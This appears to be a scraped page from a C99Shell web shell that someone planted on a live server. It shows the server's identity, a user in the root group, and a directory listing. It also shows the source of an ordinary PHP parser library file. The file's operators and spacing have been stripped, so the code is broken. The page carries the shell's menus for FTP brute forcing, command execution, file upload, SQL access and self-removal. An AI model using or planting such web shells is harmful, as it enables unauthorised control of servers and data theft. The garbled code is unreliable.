!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/nikic/php-parser/lib/PhpParser/Parser/   drwxr-xr-x
Free 28.52 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Multiple.php (1.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);

namespace 
PhpParser\Parser;

use 
PhpParser\Error;
use 
PhpParser\ErrorHandler;
use 
PhpParser\Parser;

class 
Multiple implements Parser
{
    
/** @var Parser[] List of parsers to try, in order of preference */
    
private $parsers;

    
/**
     * Create a parser which will try multiple parsers in an order of preference.
     *
     * Parsers will be invoked in the order they're provided to the constructor. If one of the
     * parsers runs without throwing, it's output is returned. Otherwise the exception that the
     * first parser generated is thrown.
     *
     * @param Parser[] $parsers
     */
    
public function __construct(array $parsers) {
        
$this->parsers $parsers;
    }

    public function 
parse(string $codeErrorHandler $errorHandler null) {
        if (
null === $errorHandler) {
            
$errorHandler = new ErrorHandler\Throwing;
        }

        list(
$firstStmts$firstError) = $this->tryParse($this->parsers[0], $errorHandler$code);
        if (
$firstError === null) {
            return 
$firstStmts;
        }

        for (
$i 1$c count($this->parsers); $i $c; ++$i) {
            list(
$stmts$error) = $this->tryParse($this->parsers[$i], $errorHandler$code);
            if (
$error === null) {
                return 
$stmts;
            }
        }

        throw 
$firstError;
    }

    private function 
tryParse(Parser $parserErrorHandler $errorHandler$code) {
        
$stmts null;
        
$error null;
        try {
            
$stmts $parser->parse($code$errorHandler);
        } catch (
Error $error) {}
        return [
$stmts$error];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--